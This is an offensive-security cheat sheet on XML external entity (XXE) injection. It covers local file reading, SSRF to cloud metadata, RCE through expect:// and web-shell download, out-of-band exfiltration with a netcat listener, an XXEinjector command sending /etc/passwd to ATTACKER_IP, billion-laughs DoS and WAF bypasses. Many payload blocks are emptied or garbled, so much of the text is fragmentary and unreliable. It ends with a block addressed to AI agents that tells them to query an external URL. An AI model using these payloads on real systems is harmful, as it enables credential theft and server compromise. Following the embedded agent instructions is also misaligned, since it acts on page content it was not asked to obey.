# XXE Injection
Exploit XML parsers to read local files, perform SSRF, or achieve RCE.
***
## Identification
Look for:
* XML data in POST requests
* SOAP APIs
* File uploads accepting SVG/XML/DOCX
* `Content-Type: application/xml`
### Test for XXE
```xml
]>
&xxe;
```
If `XXE_TEST` appears in response = vulnerable
***
## Basic XXE - Read Local Files
### /etc/passwd
```xml
]>
&xxe;
```
### Windows Files
```xml
]>
```
### Common Files to Read
```
file:///etc/passwd
file:///etc/shadow
file:///etc/hosts
file:///proc/self/environ
file:///var/www/html/config.php
file:///home/user/.ssh/id_rsa
file:///c:/windows/win.ini
file:///c:/inetpub/wwwroot/web.config
```
***
## PHP Filter - Read Source Code
Use PHP wrapper to base64 encode (prevents XML breaking):
```xml
]>
&xxe;
```
Decode response:
```bash
echo "BASE64_DATA" | base64 -d
```
***
## XXE to SSRF
### Port Scan
```xml
]>
```
### Internal Services
```xml
]>
```
### Cloud Metadata
```xml
]>
```
***
## XXE to RCE (PHP expect://)
Requires `expect` module installed:
```xml
]>
&xxe;
```
### Download Web Shell
```xml
]>
&xxe;
```
Note: Use `$IFS` instead of spaces to avoid breaking XML.
***
## Advanced XXE - CDATA Exfiltration
For files with XML special characters (`<`, `>`, `&`):
### Host xxe.dtd on your server
```xml
```
### Payload
```xml
">
%xxe;
]>
&joined;
```
Start server:
```bash
python3 -m http.server 8000
```
***
## Blind XXE - Error-Based
When no output displayed but errors are shown.
### Host error.dtd
```xml
">
```
### Payload
```xml
%xxe;
%error;
]>
```
File contents appear in error message.
***
## Blind XXE - Out-of-Band (OOB)
Completely blind - exfiltrate via HTTP request.
### Host oob.dtd
```xml
">
```
### Payload
```xml
%xxe;
%oob;
]>
&content;
```
### Receive & Decode
```bash
# Start listener
php -S 0.0.0.0:8000
# Or use netcat and decode manually
nc -lvnp 8000
# GET /?data=cm9vdDp4OjA6M... HTTP/1.1
echo "cm9vdDp4OjA6M..." | base64 -d
```
### PHP Auto-Decode Script
```php
```
***
## XXE in File Uploads
### SVG XXE
```xml
]>
```
### XLSX/DOCX XXE
1. Unzip the file
2. Edit `[Content_Types].xml` or `xl/workbook.xml`
3. Add XXE payload
4. Re-zip and upload
***
## XXE DoS (Billion Laughs)
```xml
]>
&lol5;
```
Note: Modern servers often protected against this.
***
## XXEinjector (Automated Tool)
```bash
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
# Create request file with XXEINJECT marker
cat > xxe.req << 'EOF'
POST /submit HTTP/1.1
Host: TARGET
Content-Type: application/xml
XXEINJECT
EOF
# Run OOB exfiltration
ruby XXEinjector.rb --host=ATTACKER_IP --httpport=8000 \
--file=xxe.req --path=/etc/passwd --oob=http --phpfilter
# Check results
cat Logs/TARGET/etc/passwd.log
```
***
## Bypass WAF
### UTF-7 Encoding
```xml
+ADw-!DOCTYPE foo +AFs-
+ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-
+AFs-+AD4-
```
### Parameter Entities Only
```xml
%xxe;
]>
```
### URL Encoding
```
file:///etc%2fpasswd
```
***
## Quick Reference Payloads
| Target | Payload |
| ------------- | ---------------------------------------------------------------------------------------- |
| /etc/passwd | `` |
| PHP Source | `` |
| AWS Metadata | `` |
| SSRF Internal | `` |
| RCE (expect) | `` |
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://book.ice-wzl.xyz/web/xxe.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.